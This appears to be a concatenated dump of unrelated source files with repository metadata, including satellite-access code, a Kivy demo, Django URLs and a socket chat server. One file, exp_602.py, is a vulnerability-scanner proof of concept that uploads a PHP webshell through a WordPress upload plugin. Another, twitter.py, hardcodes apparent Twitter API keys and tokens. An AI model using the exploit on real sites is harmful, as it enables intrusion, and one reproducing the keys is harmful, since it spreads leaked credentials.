# save_plot("/home/jens/Documents/projekte/crn/170817/plots/t1_vergleich")
# %%
# do_t1_bruker()
do_bruker_beta()
# show_plot()
| [
"jens.adam@tu-dortmund.de"
] | jens.adam@tu-dortmund.de |
ae5fa2cf162831595429963b02bdc5cfc7fb8baf | 7e9daf6a2a3ebfb969e793f92afc0dc5f1c2fc35 | /venv/bin/pip | f925d1739221b77a3093bdff330b2aded4106b0b | [] | no_license | NARESHSWAMI199/5-Star-On-Hacker-Rank-Python | e43ce5cb3429d2a683c37e6f4ba6440d073d47c2 | 51f245d1d0966de21ddf861b22fe3379e7c8a0a7 | refs/heads/main | 2023-02-25T03:05:25.330205 | 2021-01-19T13:49:27 | 2021-01-19T13:49:27 | 325,296,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | #!/home/naresh/Documents/django/hrank/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"swaminaresh993@gmail.com"
] | swaminaresh993@gmail.com | |
1a17bc069625e3f341c7c83afad9089213f1170a | 7c027160909486e2904a5bb65e65628124d271b5 | /brahe/access/access.py | db870165ffb536ae0a00c9db886e0776997be3e0 | [
"MIT"
] | permissive | lirun-sat/brahe | 84df8f0c2c36d004fe028d5d2602edd737934f92 | 4a1746ef3c14211b0709de6e7e34b6f52fc0e686 | refs/heads/master | 2023-09-04T13:18:36.023992 | 2021-11-19T03:48:03 | 2021-11-19T03:48:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,531 | py | '''The access module provides functionality to compute access opportunities,
geometry, and boundaries under different constraints.
'''
import logging
import typing
import copy
import datetime
import math
import numpy as np
from brahe.constants import RAD2DEG
from brahe.epoch import Epoch
from brahe.tle import TLE
from brahe.coordinates import sECEFtoGEOD
from brahe.astro import orbital_period, sCARTtoOSC
import brahe.data_models as bdm
import brahe.utils as utils
from . import access_geometry as ageo
logger = logging.getLogger(__name__)
###############
# Constraints #
###############
def access_constraints(epc: Epoch, sat_ecef: np.ndarray, loc_ecef: np.ndarray,
constraints: bdm.AccessConstraints,
constraint_list: typing.List[str], **kwargs):
'''Check if all access constraints are satisfied.
Args:
epc (:obj:`Epoch`): Epoch of geometric access
sat_ecef (:obj:`np.ndarray`): Satellite ECEF state
loc_ecef (:obj:`np.ndarray`): Location ECEF
constraints (:obj:`AccessConstraints`): Constraint object
constraint_list (List[str]): List of constraint functions to apply to
check for access.
kwargs (dict): Accepts arbitrary keywoard arguments
Returns:
bool: Constraints satisfied.
'''
valid = True
for field in constraint_list:
valid = valid and globals()[f'{field}_constraint'](epc, sat_ecef, loc_ecef, constraints, **kwargs)
return valid
def look_direction_constraint(epc: Epoch, sat_ecef: np.ndarray,
loc_ecef: np.ndarray,
constraints: bdm.AccessConstraints, **kwargs):
'''Look direction access constraint.
Args:
epc (:obj:`Epoch`): Epoch of access
sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
constraints (:obj:`AccessConstraints`): Constraint settings
Returns:
bool: True if constraint is satisfied (feasible) at given state and time.
'''
look_dir = ageo.look_direction(sat_ecef, loc_ecef)
if constraints.look_direction == bdm.LookDirection.either or look_dir == constraints.look_direction:
return True
else:
return False
def ascdsc_constraint(epc: Epoch, sat_ecef: np.ndarray,
loc_ecef: np.ndarray, constraints: bdm.AccessConstraints, **kwargs):
'''Ascending/descending access constraint.
Args:
epc (:obj:`Epoch`): Epoch of access
sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
constraints (:obj:`AccessConstraints`): Constraint settings
Returns:
bool: True if constraint is satisfied (feasible) at given state and time.
'''
ascdsc = ageo.ascdsc(sat_ecef)
if constraints.ascdsc == bdm.AscendingDescending.either or ascdsc == constraints.ascdsc:
return True
else:
return False
return True
def look_angle_constraint(epc: Epoch, sat_ecef: np.ndarray,
loc_ecef: np.ndarray,
constraints: bdm.AccessConstraints, **kwargs):
'''Look angle access constraint.
Args:
epc (:obj:`Epoch`): Epoch of access
sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
constraints (:obj:`AccessConstraints`): Constraint settings
Returns:
bool: True if constraint is satisfied (feasible) at given state and time.
'''
look_angle = ageo.look_angle(sat_ecef, loc_ecef, use_degrees=True)
if constraints.look_angle_min <= look_angle <= constraints.look_angle_max:
return True
else:
return False
def elevation_constraint(epc: Epoch, sat_ecef: np.ndarray,
loc_ecef: np.ndarray,
constraints: bdm.AccessConstraints, **kwargs):
'''Elevation constraint.
Args:
epc (:obj:`Epoch`): Epoch of access
sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
constraints (:obj:`AccessConstraints`): Constraint settings
Returns:
bool: True if constraint is satisfied (feasible) at given state and time.
'''
azimuth, elevation, _ = ageo.azelrng(sat_ecef, loc_ecef, use_degrees=True)
if constraints.elevation_min <= elevation <= constraints.elevation_max:
return True
else:
return False
def tile_direction_constraint(epc: Epoch,
sat_ecef: np.ndarray,
loc_ecef: np.ndarray,
constraints: bdm.AccessConstraints,
tile: bdm.Tile = None,
max_alignment_deviation: float = 10,
**kwargs):
'''Tile direction access constraint. Limits access to satellites
aligned with tile direction.
Args:
epc (:obj:`Epoch`): Epoch of access
sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
constraints (:obj:`AccessConstraints`): Constraint settings
tile (:obj:`tile`): Tile associated with collect
max_alignment_deviation (float): Maximum deviation of satellite velocity
vector and tile direction.
Returns:
bool: True if constraint is satisfied (feasible) at given state and time.
'''
if len(sat_ecef) < 6:
raise RuntimeError(
f'Invalid input length of {len(sat_ecef)}. Must be at least length 6.'
)
if not tile:
raise RuntimeError(f'Missing expected keyword argument "tile"')
# Satellite Point
sat_pnt = np.asarray(sat_ecef[0:3])
sat_pnt = sat_pnt / np.linalg.norm(sat_pnt)
# Get Direction vectors
sat_dir = np.asarray(sat_ecef[3:6])
tile_dir = np.asarray(tile.tile_direction)
sat_dir = sat_dir / np.linalg.norm(sat_dir)
tile_dir = tile_dir / np.linalg.norm(tile_dir)
# Remove component of satellite velocity normal to Earth's surface
sat_dir = sat_dir - np.dot(sat_dir, sat_pnt)
sat_dir = sat_dir / np.linalg.norm(sat_dir)
# Compute alignment of satellite velocity and tile direction
alignment_vector = np.dot(sat_dir, tile_dir)
alignment_angle = math.acos(alignment_vector) * RAD2DEG
if alignment_angle < max_alignment_deviation:
return True
else:
return False
# ######################
# # Access Computation #
# ######################
def find_geometric_constraint_boundary(tle: TLE,
center_ecef: np.ndarray,
constraints: bdm.AccessConstraints,
constraint_list: typing.List[str],
epc0: Epoch,
timestep: float = 1.0,
tol: float = 0.001,
**kwargs) -> Epoch:
'''Find boundary of next transition from current visibility status (True/False)
to opposite visibility status (True/False).
Args:
tle (:obj:`TLE`): TLE object.
center_ecef (np.ndarray): Center location to compute access constraints with respect to.
constraints (typing.List[str]): Access constraint properties.
constraint_list (List[str]): List of constraint functions to apply to check for access
timestep (float): timestep for search
tol (float): Time tolerance for constraint boundaries.
kwargs (dict): Accepts keyword arguments passed to constraint function
Returns:
Epoch: Time boundary (Epoch)
'''
# Copy step epoch
epc = copy.deepcopy(epc0)
if math.fabs(timestep) < tol:
return epc0
else:
x_ecef = tle.state_itrf(epc)
visible = access_constraints(epc, x_ecef, center_ecef, constraints, constraint_list, **kwargs)
while access_constraints(epc, x_ecef, center_ecef, constraints, constraint_list, **kwargs) == visible:
epc += timestep
x_ecef = tle.state_itrf(epc)
next_step = -np.sign(timestep) * max(math.fabs(timestep) / 2.0, tol / 2.0)
return find_geometric_constraint_boundary(tle, center_ecef, constraints,
constraint_list, epc, timestep=next_step, tol=tol, **kwargs)
def compute_access_properties(tle: TLE, center_ecef: np.ndarray,
t_start: Epoch, t_end: Epoch):
'''Compute access properties of Contact or Collect.
Args:
tle (:obj:`TLE`): TLE object
center_ecef (np.ndarray): Center location to compute access constraints with respect to.
t_start (:obj:`Epoch`): Start of access window
t_end (:obj:`Epoch`): End of access window
Returns:
AccessProperties: Geometric properties of access
'''
# Get Window Midtime
t_midtime = t_start + (t_end - t_start) / 2.0
sat_midtime = tle.state_itrf(t_midtime)
sat_start = tle.state_itrf(t_start)
sat_end = tle.state_itrf(t_end)
# Access Properties Object
access_properties = bdm.AccessProperties()
# General Geometry
access_properties.ascdsc = ageo.ascdsc(sat_midtime)
access_properties.look_direction = ageo.look_direction(sat_midtime, center_ecef)
# Compute Geometry Properties
access_properties.azimuth_open = ageo.azimuth(sat_start, center_ecef)
access_properties.azimuth_close = ageo.azimuth(sat_end, center_ecef)
# NOTE: Assumes that maximal values for look angle and elevation occur
# at either the start, end, or midtime.
access_properties.elevation_min = min(
ageo.elevation(sat_start, center_ecef),
ageo.elevation(sat_end, center_ecef)
)
access_properties.elevation_max = ageo.elevation(sat_midtime, center_ecef)
access_properties.look_angle_min = ageo.look_angle(sat_midtime, center_ecef)
access_properties.look_angle_max = max(
ageo.look_angle(sat_start, center_ecef),
ageo.look_angle(sat_end, center_ecef)
)
# Set max and min values
access_properties.elevation_min = round(access_properties.elevation_min, 6)
access_properties.elevation_max = round(access_properties.elevation_max, 6)
access_properties.look_angle_min = round(access_properties.look_angle_min, 6)
access_properties.look_angle_max = round(access_properties.look_angle_max, 6)
# Compute LOS start and end
z_los_start = center_ecef - sat_start[0:3] # Compute look angle
access_properties.los_start = (z_los_start / np.linalg.norm(z_los_start)).tolist()
z_los_end = center_ecef - sat_end[0:3] # Compute look angle
access_properties.los_end = (z_los_end / np.linalg.norm(z_los_end)).tolist()
return access_properties
def find_location_accesses(spacecraft: bdm.Spacecraft, geojson: bdm.GeoJSONObject,
t_start: Epoch, t_end: Epoch,
timestep: float = 120.0, tol: float = 1e-3,
orbit_fraction: float = 0.75, **kwargs):
'''Final all opportunities for accesses over the period `t_start` to `t_end`.
Accepts either `Station` or `Tile` as primary inputs and returns `Contact`
or `Collect` respectively.
Args:
spacecraft (:obj:`Spacecraft`): Spacecraft object.
geojson (:obj:`Union[Station, Tile]`): Location object with center_point for access. Tile or Station
t_start (:obj:`Epoch`): Start of window for access computation. GPS Time.
t_end (:obj:`Epoch`): End of window for access computation. GPS Time.
timestep (float, Default: 120): timestep for search
tol (float, Default: 1e-3): Time tolerance for constraint boundaries.
orbit_fraction (float, Default: 0.75): Fraction of orbital period to advance search after finding an access.
request (:obj:`Request`): Request. Only required if input GeoJSON is `Tile`
kwargs (dict): Accepts keyword arguments passed to constraint function.
Returns:
List[Union[Contact, Collect]]: `Contact` or `Collect` opportunities.
'''
opportunities = []
# Assert time types as epochs
t_start = Epoch(t_start, time_system='UTC')
t_end = Epoch(t_end, time_system='UTC')
# Set search window based on request window
if type(geojson) == bdm.Tile:
request = kwargs.get('request', None)
if not request:
raise ValueError(f'Missing kwarg "request"')
# Get Additional Values
constraints = None
if type(geojson) == bdm.Tile:
constraints = request.constraints
elif type(geojson) == bdm.Station:
constraints = geojson.constraints
else:
raise ValueError(f'Cannot compute access for geojson input of type {type(geojson)}. Must be Tile or GroundStation.')
# Set constraint functions to apply
if type(geojson) == bdm.Tile:
constraint_list = ['look_direction', 'ascdsc', 'look_angle', 'elevation', 'tile_direction']
elif type(geojson) == bdm.Station:
constraint_list = ['elevation']
else:
raise ValueError(f'No constraint list defined for geojson input of type {type(geojson)}. Must be Tile or GroundStation.')
# Add Auxiliary Variables to kwargs
kwargs['spacecraft_id'] = spacecraft.id
if type(geojson) == bdm.Tile:
kwargs['tile'] = geojson
# Set start time as initial Epoch
epc = copy.deepcopy(t_start)
# SGP TLE Propagator
tle = spacecraft.tle
# Compute orbital period
T = orbital_period(sCARTtoOSC(tle.state_gcrf(t_start), use_degrees=True)[0])
while epc < t_end:
# Compute satellite state in pseudo-earth-fixed fame
x_ecef = tle.state_itrf(epc)
if access_constraints(epc, x_ecef, geojson.center_ecef, constraints, constraint_list, **kwargs):
# Search for AOS (before initial guess epoch)
collect_ts = find_geometric_constraint_boundary(tle, geojson.center_ecef,
constraints, constraint_list, epc, timestep=-timestep, tol=tol, **kwargs
)
collect_te = find_geometric_constraint_boundary(tle, geojson.center_ecef,
constraints, constraint_list, epc, timestep=timestep, tol=tol, **kwargs
)
# Create Collect Properties
if type(geojson) == bdm.Tile:
# Adjust t_start / t_end based on request properites
collect_tm = collect_ts + (collect_te - collect_ts)/2.0
collect_ts = collect_tm - request.properties.collect_duration/2.0
collect_te = collect_tm + request.properties.collect_duration/2.0
# Compute Opportunity Properties
access_properties = compute_access_properties(tle, geojson.center_ecef, collect_ts, collect_te)
# Create opportunity object
opportunity = None
if type(geojson) == bdm.Tile:
opportunity = bdm.Collect(
center=geojson.center.tolist(),
center_ecef=geojson.center_ecef.tolist(),
t_start=collect_ts.to_datetime(tsys='UTC'),
t_end=collect_te.to_datetime(tsys='UTC'),
spacecraft_id=spacecraft.id,
access_properties=access_properties,
tile_id=geojson.tile_id,
tile_group_id=geojson.tile_group_id,
request_id=request.request_id,
)
elif type(geojson) == bdm.Station:
opportunity = bdm.Contact(
center=geojson.center.tolist(),
center_ecef=geojson.center_ecef.tolist(),
t_start=collect_ts.to_datetime(tsys='UTC'),
t_end=collect_te.to_datetime(tsys='UTC'),
spacecraft_id=spacecraft.id,
access_properties=access_properties,
station_id=geojson.station_id,
station_name=geojson.station_name,
)
# Add opportunity to constraints
opportunities.append(opportunity)
# Step fraction of an orbit
epc += orbit_fraction * T
else:
epc += timestep
return opportunities
| [
"duncan.eddy@gmail.com"
] | duncan.eddy@gmail.com |
8da334eb44c9ea9052929ef18f09fca3bede6dbe | 65348a4305d10b88c3b4e34eb00d66cf5db6aba7 | /main.py | 225446846dea7cdde0668e429d65088b5214d266 | [] | no_license | lailacampos/Simple-GUI-Kivy | a3671b9dd7f39c6b1efb3c0521753a8a99f32fa8 | 19b0ed9ff7ad4039d842b2d4223a7d79ffb56dc2 | refs/heads/main | 2023-08-22T03:08:48.696503 | 2021-09-22T02:19:27 | 2021-09-22T02:19:27 | 407,191,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | # Useful links:
# https://kivy.org/doc/stable/guide/basic.html#quickstart
# https://kivy.org/doc/stable/api-kivy.app.html
# https://youtu.be/YDp73WjNISc
from kivy.app import App
from kivy.uix.label import Label
# The MyMainApp() class is derived from the App() class of the kivy.app repository.
# The App() class is the base for creating Kivy applications.
# Kivy requires that the class inherits from the App class
class MyApp(App):
# The build() method initializes the application and returns a widget that will be used as [root] and added to the window.
# This method doesn't need to be called,: the App().run() will do that.
def build(self):
label = Label(text="Hello World")
return label
if __name__ == "__main__":
MyApp().run()
| [
"enders.game1990@gmail.com"
] | enders.game1990@gmail.com |
105ea887fde8976e0371b1515151cd874df939cd | 39dc5f1ffa71ad5e7aab5e92bb118bddf3ddae44 | /ats/users/urls.py | 63a22a7046e3bb8a9decd34439b0530732abd1fc | [
"MIT"
] | permissive | MahmoudFarid/ats | 14422a136c574d33745ac874e02e2211cce8bf14 | 1f882168cba2f34451cbb9bba1e37ce93ef0c465 | refs/heads/master | 2023-08-28T09:08:49.860168 | 2020-07-28T20:35:00 | 2020-07-28T20:35:00 | 278,744,279 | 0 | 0 | MIT | 2021-11-12T15:22:34 | 2020-07-10T22:23:07 | Python | UTF-8 | Python | false | false | 358 | py | from django.urls import path
from ats.users.views import (
user_detail_view,
user_redirect_view,
user_update_view,
)
app_name = "users"
urlpatterns = [
path("~redirect/", view=user_redirect_view, name="redirect"),
path("~update/", view=user_update_view, name="update"),
path("<str:email>/", view=user_detail_view, name="detail"),
]
| [
"mahmoud.farid.94@gmail.com"
] | mahmoud.farid.94@gmail.com |
eaaa81b1408518c00362eba85a5c786b9f3f4508 | 50fd4227fb802d65ae6620a3859dd992cb650717 | /po/update-po.py | d6e63063ddfa505286036b1b146456bf5bf3dbe7 | [
"Zlib"
] | permissive | danpla/dpscreenocr | 626c8004a388289589fa254b8b8916b8a3ada50a | 00ef775dae03e6de74bc07cfd04a0918febc8e30 | refs/heads/master | 2023-08-16T07:01:34.946170 | 2023-08-15T19:13:28 | 2023-08-15T19:13:28 | 173,785,193 | 193 | 19 | Zlib | 2020-05-29T19:56:53 | 2019-03-04T16:55:10 | C++ | UTF-8 | Python | false | false | 2,386 | py | #!/usr/bin/env python3
import glob
import os
import shutil
import subprocess
import sys
APP_NAME = 'dpScreenOCR'
APP_FILE_NAME = 'dpscreenocr'
BUGS_ADDRESS = 'https://github.com/danpla/dpscreenocr/issues'
def check_min_version(tool_path, min_version):
version_info = subprocess.check_output(
(tool_path, '-V'), text=True).splitlines()[0]
# Version info from GNU gettext tools looks like:
# xgettext (GNU gettext-tools) 0.21.1
version = version_info.rpartition(' ')[2]
if any(not s.isdigit() for s in version.split('.')):
sys.exit(
'Unexpected {} version info string format \"{}\"'.format(
tool_path, version_info))
if version < min_version:
sys.exit(
'{} version {} is less than {}'.format(
tool_path, version, min_version))
def main():
xgettext_path = shutil.which('xgettext')
if not xgettext_path:
sys.exit('xgettext not found')
# We need xgettext 0.19 for desktop file support. msgmerge can be
# of any version.
check_min_version(xgettext_path, "0.19")
msgmerge_path = shutil.which('msgmerge')
if not msgmerge_path:
sys.exit('msgmerge not found')
subprocess.check_call((
xgettext_path,
'--files-from=POTFILES.in',
'--from-code=UTF-8',
'--add-comments=Translators:',
'--package-name=' + APP_NAME,
'--msgid-bugs-address=' + BUGS_ADDRESS,
'--directory=..',
'--output=' + APP_FILE_NAME + '.pot',
'-k_',
'-kN_'))
# Handle the desktop entry separately instead of including it in
# POTFILES.in. This way we can disable the default keyword list,
# which includes "Name" that should not be translated.
subprocess.check_call((
xgettext_path,
'--from-code=UTF-8',
'--omit-header',
'--join-existing',
'--directory=..',
'--output=' + APP_FILE_NAME + '.pot',
'-k', # Disable default keywords
'-kComment',
os.path.join('data', APP_FILE_NAME + '.desktop')))
for po_path in glob.glob('*.po'):
subprocess.check_call((
msgmerge_path,
'--quiet',
'--update',
'--no-fuzzy-matching',
'--backup=off',
po_path,
APP_FILE_NAME + '.pot'))
if __name__ == '__main__':
main()
| [
"daniel.plakhotich@gmail.com"
] | daniel.plakhotich@gmail.com |
6b7b060513cf603782ed5bf499c61bedf4ab8776 | 43ff15a7989576712d0e51f0ed32e3a4510273c0 | /tools/pocs/bugscan/exp_602.py | 9d51ac6e5eea714832eab404bedc4db5c96a7b00 | [] | no_license | v1cker/kekescan | f2b51d91a9d6496e2cdc767eb6a600171f513449 | 3daa1775648439ba9e0003a376f90b601820290e | refs/heads/master | 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,189 | py | # -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
payload = arg + path
filename = "Content-Disposition: backdoor.php"
shell = "<?php echo md5(123)?>"
code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
code, head, res, _, _ = curl.curl(arg + uploadfile)
if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
security_hole("webshell url:%s" % (arg + uploadfile))
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])
| [
"liyueke@huobi.com"
] | liyueke@huobi.com |
de16d21a45bf2064b1b6afc2ef1c5ced56181fb4 | d25a8e1be90d12ec087e2d97256c7476b5db6a7c | /Assignment-5/part1/file_generator.py | 3511f4c543548799e5732db28497c236c3bb7aa0 | [] | no_license | bendavp/cs4500-assignments | f5d585c7226497506d10b167274d197e7b7c0861 | c8d51efd2f5d2bca77748014833c6416f7b1f5c0 | refs/heads/master | 2022-07-29T15:42:13.786907 | 2020-05-18T22:44:10 | 2020-05-18T22:44:10 | 265,082,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | #!/usr/bin/python
from random import random
from random import randint
from random import seed
from random import choice
import string
import sys
# takes 2 inputs
# first input = "file_name.txt"
# second input = number of rows
# details about the file that can be changed
outFile = sys.argv[1]
numRows = int(sys.argv[2])
# for generating ints/floats/bools/strings
letters = string.ascii_letters
seed(1)
with open(outFile, "w") as f:
for x in range(numRows):
colsToAdd = []
colsToAdd.append(str(randint(0,200))) # int col 1
colsToAdd.append(str(randint(0,200))) # int col 2
colsToAdd.append(str(randint(0,200))) # int col 3
colsToAdd.append(str(random() * 200)) # float 4
colsToAdd.append(str(random() * 200)) # float 5
colsToAdd.append(str(randint(0,1))) # bool 6
colsToAdd.append(str(randint(0,1))) # bool 7
colsToAdd.append(''.join(choice(letters) for i in range(randint(3,20)))) # string 8
colsToAdd.append(''.join(choice(letters) for i in range(randint(3,20)))) # string 9
colsToAdd.append(''.join(choice(letters) for i in range(randint(3,20)))) # string 10
f.write('\t'.join(colsToAdd) + '\n')
| [
"tang.amy@husky.neu.edu"
] | tang.amy@husky.neu.edu |
bbe5423c3579702ac9aedd2796d1d72907b0b9ac | 9ef923b4f24e1db90cc2904556fe30c4d99abff6 | /list-find.py | 8b60c224aa57c90952cb38c11ad5efd2c59bf10e | [] | no_license | magda-zielinska/python-level1 | f8ca551fb6b136a8eef51a24a617eea475c34b85 | c6a19b6d35a1b68ba6294e82074e3085e8d34c6f | refs/heads/master | 2021-10-21T07:43:37.666621 | 2019-03-03T11:00:21 | 2019-03-03T11:00:21 | 173,561,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
tofind = 5
found = False
for i in range(len(list)):
found = list[i] == tofind
if found:
if found:
print("Element found on index: ",i)
else:
print("absent")
drawn = [5, 11, 9, 42, 3, 49]
bets = [3, 7, 11, 42, 34, 49]
hits = 0
for number in bets:
if number in drawn:
hits += 1
print(hits) | [
"zielinska.magdalen@gmail.com"
] | zielinska.magdalen@gmail.com |
893302d6151ff683089fe6f7d3fd8ab6e7f1dff7 | a6b83ca764b8e81b2f3dad64fad1fc4e5eaa2acb | /tests/github_api_test.py | 9c26c2552200ee9ca82849ae6f356308aea6ed41 | [
"MIT"
] | permissive | wilcarllopez/search-github | c919cfbc265c8915269d2bdc2a8a5fe8d02f509d | a6b6900458356fee9e04ced8373b83aca5d8887e | refs/heads/master | 2020-08-29T06:13:05.497151 | 2019-10-28T09:04:19 | 2019-10-28T09:04:19 | 217,951,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | import github_api
import pytest
import time
timestr = time.strftime("%Y-%m-%d-%H-%M")
def test_timestamp_name():
assert github_api.timestamp_name() == timestr
def test_main
if __name__ == '__main__':
pytest.main() | [
"wilcarllopez@gmail.com"
] | wilcarllopez@gmail.com |
20d336dd81d1a78129de182250f5ee075f1ebcf2 | c1f6e3e590e735e89fcdefda914ab1eec914da2d | /src/python/design/1396_design_underground_system.py | 715d7811568134b99b7e9f85f7f9db01abdde0f6 | [] | no_license | alannesta/algo4 | eb1e3c64a6bf27f55bb6b0a16efc4188f5f97da4 | 46bd8d1b44cb19aa773cc072cc9be97e9a0e348d | refs/heads/master | 2022-11-28T14:33:44.863799 | 2022-11-25T22:02:03 | 2022-11-25T22:02:03 | 55,170,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,428 | py | """
https://leetcode.com/problems/design-underground-system/
"""
from collections import deque
class UndergroundSystem:
def __init__(self):
self.check_in = {}
self.check_out = {}
def checkIn(self, id: int, stationName: str, t: int) -> None:
self.check_in[id] = (stationName, t)
def checkOut(self, id: int, stationName: str, t: int) -> None:
check_in_station = self.check_in[id][0]
check_in_time = self.check_in[id][1]
del self.check_in[id]
key = (check_in_station, stationName)
if key in self.check_out:
self.check_out[key][0] += t - check_in_time
self.check_out[key][1] += 1
else:
# [total time, count)
self.check_out[key] = [t - check_in_time, 1]
def getAverageTime(self, startStation: str, endStation: str) -> float:
return self.check_out[(startStation, endStation)][0] / self.check_out[(startStation, endStation)][1]
# Your UndergroundSystem object will be instantiated and called as such:
"""
["UndergroundSystem","checkIn","checkIn","checkOut","checkIn","checkOut","checkOut","checkIn","getAverageTime","getAverageTime","checkIn","checkIn","getAverageTime"]
[[],[596854,"EQH524YN",13],[29725,"Y1A2ROGU",17],
[596854,"8AYN1B7O",115],[579716,"EQH524YN",145],[579716,"8AYN1B7O",199],
[29725,"8AYN1B7O",295],[939079,"16MTS56Z",371],["EQH524YN","8AYN1B7O"],
["Y1A2ROGU","8AYN1B7O"],[697035,"EQH524YN",442],[90668,"Y1A2ROGU",508],
["EQH524YN","8AYN1B7O"]]
"""
ops = ["UndergroundSystem", "checkIn", "checkIn", "checkOut", "checkIn", "checkOut", "checkOut", "checkIn",
"getAverageTime", "getAverageTime", "checkIn", "checkIn", "getAverageTime"]
vals = [[], [596854, "EQH524YN", 13], [29725, "Y1A2ROGU", 17],
[596854, "8AYN1B7O", 115], [579716, "EQH524YN", 145], [579716, "8AYN1B7O", 199],
[29725, "8AYN1B7O", 295], [939079, "16MTS56Z", 371], ["EQH524YN", "8AYN1B7O"],
["Y1A2ROGU", "8AYN1B7O"], [697035, "EQH524YN", 442], [90668, "Y1A2ROGU", 508],
["EQH524YN", "8AYN1B7O"]]
obj = UndergroundSystem()
for op in zip(ops, vals):
if op[0] == 'checkIn':
obj.checkIn(*op[1])
if op[0] == 'checkOut':
obj.checkOut(*op[1])
if op[0] == 'getAverageTime':
print(obj.getAverageTime(*op[1]))
# obj.checkIn(id,stationName,t)
# obj.checkOut(id,stationName,t)
# param_3 = obj.getAverageTime(startStation,endStation)
| [
"alannestacao@gmail.com"
] | alannestacao@gmail.com |
837047daafa3fbf8fb518cb9e035f1e52f6c5d52 | b3763ef899a1edd70867937e4e52277eaf1aa131 | /twitter.py | 62cd8003b720c0d803a6d0d9f94564ec8270d9bf | [] | no_license | ShamarB/Twitter-Bot | 62085022b4f887f2a9000d53fc2682fae3a5fafb | 709f40a4406bc805e87325ebb89c63bbdd903b8d | refs/heads/main | 2022-12-31T00:19:55.873900 | 2020-10-18T19:49:14 | 2020-10-18T19:49:14 | 305,182,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | import tweepy
import time
auth = tweepy.OAuthHandler('J0UjmyOsjZ7zYSpYnWrXNEOva',
'Kv2tI5Vv2NDPA0J4HI3RfbJCXr8XvJRYfx6byJOIxXecAXbZWD')
auth.set_access_token('1256998173513601025-a66icjGaHBv1JvuJiLKhhkVz9ShEqG',
'0KT5p6UZIH7ULjN6Zv9nYnXwjwd77SAqzGAvg8PV4Zv7z')
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
user = api.me()
print(user.screen_name)
for friends in tweepy.Cursor(api.friends).items():
print(friends.name)
search = 'Lakers'
nrTweets = 1
for tweet in tweepy.Cursor(api.search, search).items(nrTweets):
try:
print('tweet was liked')
tweet.retweet()
time.sleep(5)
except tweepy.TweepError as e:
print(e.reason)
except StopIteration:
break
| [
"noreply@github.com"
] | noreply@github.com |
7f719fe21255f1516a7e17bf22bfd468c890e9fc | 62451177214eb0a3cfc8f0b89b2a14ab898bf533 | /lecture_7/server_multi.py | ca5cd412efb4d4ee72b0ccda3dfc7479b0db449c | [] | no_license | ethanbar11/python_advanced_course1 | af4b0e20e640bda4d69986abb67958bd4eb181a1 | 05e7ce5c47aecc209f3540e66e180fd1da7b0282 | refs/heads/master | 2023-01-03T20:56:37.135804 | 2020-11-03T19:08:31 | 2020-11-03T19:08:31 | 293,882,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,231 | py | import threading
import socket
import time
import python_advanced_course1.lecture_5.FILE_DAL as DAL
from queue import Queue
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('127.0.0.1', 8089))
serversocket.listen(5) # become a server socket, maximum 5 connections
print("Started listening!")
# Block until new client is connected
msg_queue = Queue()
client_sockets = []
def receiving_from_certain_client(client_socket):
is_running = True
while is_running:
msg = client_socket.recv(1024)
if msg != '':
msg_decoded = msg.decode()
msg_queue.put(msg_decoded)
else:
is_running = False
def sending_from_queue():
while True:
msg = msg_queue.get()
for socket in client_sockets:
socket.send(msg.encode())
sending_from_queue_thread = threading.Thread(target=sending_from_queue)
sending_from_queue_thread.start()
while True:
client_socket, address = serversocket.accept()
client_sockets.append(client_socket)
client_socket_thread = threading.Thread(target=receiving_from_certain_client,
args=(client_socket,))
client_socket_thread.start()
| [
"ethanbarbar@gmail.com"
] | ethanbarbar@gmail.com |
5979042ecef7aab7fc251af4efd1c0f05b6ca7eb | 9a28e0cecdf71cdb4eccdfc7df2554bd421fa69f | /src/hio/core/udp/udping.py | bff163c93346be5c63bb8cf904ea68b1a1ca4e35 | [
"Apache-2.0"
